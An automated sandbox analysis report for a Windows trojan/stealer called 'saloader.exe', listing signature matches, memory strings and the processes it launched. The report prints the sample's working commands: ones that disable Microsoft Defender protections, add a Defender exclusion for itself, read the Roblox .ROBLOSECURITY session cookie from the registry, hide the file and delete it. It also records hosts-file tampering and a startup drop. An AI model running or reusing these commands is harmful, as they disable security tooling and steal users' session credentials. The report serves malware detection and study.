                        Source: powershell.exe, 00000009.00000002.1345053621.0000022DA6793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F1160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F02E5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F11745000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E5A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E58FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000011.00000002.1408003898.0000022F02D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A0179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D6D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 00000011.00000002.1408003898.0000022F02D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A0179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D6D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.7:49813 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\saloader.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: saloader.exe, type: SAMPLEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC621D180_2_00007FFAAC621D18
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC6255600_2_00007FFAAC625560
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC660D480_2_00007FFAAC660D48
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC668E080_2_00007FFAAC668E08
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC660DC00_2_00007FFAAC660DC0
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC62C5C80_2_00007FFAAC62C5C8
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC62BF9D0_2_00007FFAAC62BF9D
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC6200100_2_00007FFAAC620010
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC62F8AA0_2_00007FFAAC62F8AA
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC62C0F80_2_00007FFAAC62C0F8
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC61CA160_2_00007FFAAC61CA16
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC629A880_2_00007FFAAC629A88
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC616A580_2_00007FFAAC616A58
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC62AAD00_2_00007FFAAC62AAD0
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC61DB080_2_00007FFAAC61DB08
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7E1D800_2_00007FFAAC7E1D80
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7D41980_2_00007FFAAC7D4198
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7E41910_2_00007FFAAC7E4191
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DECBA0_2_00007FFAAC7DECBA
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7E70F20_2_00007FFAAC7E70F2
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DAA950_2_00007FFAAC7DAA95
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DEA100_2_00007FFAAC7DEA10
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7D338E0_2_00007FFAAC7D338E
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7E4C620_2_00007FFAAC7E4C62
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DE8300_2_00007FFAAC7DE830
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DE9400_2_00007FFAAC7DE940
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DE9500_2_00007FFAAC7DE950
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DE9780_2_00007FFAAC7DE978
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DE9800_2_00007FFAAC7DE980
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DC4F20_2_00007FFAAC7DC4F2
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7E0CF00_2_00007FFAAC7E0CF0
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DA5020_2_00007FFAAC7DA502
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7D6AA70_2_00007FFAAC7D6AA7
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7E43590_2_00007FFAAC7E4359
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7D7B280_2_00007FFAAC7D7B28
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DF32E0_2_00007FFAAC7DF32E
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7E432C0_2_00007FFAAC7E432C
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7D883D0_2_00007FFAAC7D883D
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DF4630_2_00007FFAAC7DF463
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7E4FF90_2_00007FFAAC7E4FF9
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7E44280_2_00007FFAAC7E4428
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7D481D0_2_00007FFAAC7D481D
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7DE8380_2_00007FFAAC7DE838
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAC62947D9_2_00007FFAAC62947D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAC6F3C869_2_00007FFAAC6F3C86
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC70329214_2_00007FFAAC703292
                        Source: saloader.exe, 00000000.00000000.1205927214.000002113D67C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs saloader.exe
                        Source: saloader.exeBinary or memory string: OriginalFilename vs saloader.exe
                        Source: saloader.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: saloader.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: saloader.exe, ------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: saloader.exe, -------.csBase64 encoded string: 'rTd2ZqqxHKGDkmQucWohfW8iyG9SsMBqRCBl7sGg1S4qEzQO8MQhKhSgsSxD8Cux4BS0sGX48TfIuuruS8b8nP18HitfMrBZelHvgGZ1oqjymBjFAtto7Iw6++BT7HGLBIv1HlaO0W9bbZFNGtt/LiyOF4NRWf8zST4pmT2dijiQIVCuIrlHTZe/6Pw='
                        Source: FRc7Z.scr.0.dr, ------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: FRc7Z.scr.0.dr, -------.csBase64 encoded string: 'rTd2ZqqxHKGDkmQucWohfW8iyG9SsMBqRCBl7sGg1S4qEzQO8MQhKhSgsSxD8Cux4BS0sGX48TfIuuruS8b8nP18HitfMrBZelHvgGZ1oqjymBjFAtto7Iw6++BT7HGLBIv1HlaO0W9bbZFNGtt/LiyOF4NRWf8zST4pmT2dijiQIVCuIrlHTZe/6Pw='
                        Source: saloader.exe, ------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: saloader.exe, ------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: FRc7Z.scr.0.dr, ------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: FRc7Z.scr.0.dr, ------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@37/24@2/2
                        Source: C:\Users\user\Desktop\saloader.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\saloader.exe.logJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6652:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
                        Source: C:\Users\user\Desktop\saloader.exeMutant created: \Sessions\1\BaseNamedObjects\Muktoz4DQf6EygK0cxqE
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
                        Source: C:\Users\user\Desktop\saloader.exeFile created: C:\Users\user\AppData\Local\Temp\9vfZ0GMUz2LnbwLJump to behavior
                        Source: saloader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: saloader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\saloader.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F99F000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F900000.00000004.00000800.00020000.00000000.sdmp, KlGFZy9pxbPzA5I.0.dr, eWNRtPVIqbA91oh.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: saloader.exeReversingLabs: Detection: 78%
                        Source: saloader.exeVirustotal: Detection: 75%
                        Source: C:\Users\user\Desktop\saloader.exeFile read: C:\Users\user\Desktop\saloader.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\saloader.exe "C:\Users\user\Desktop\saloader.exe"
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe"
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pause
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: devenum.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: msdmo.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
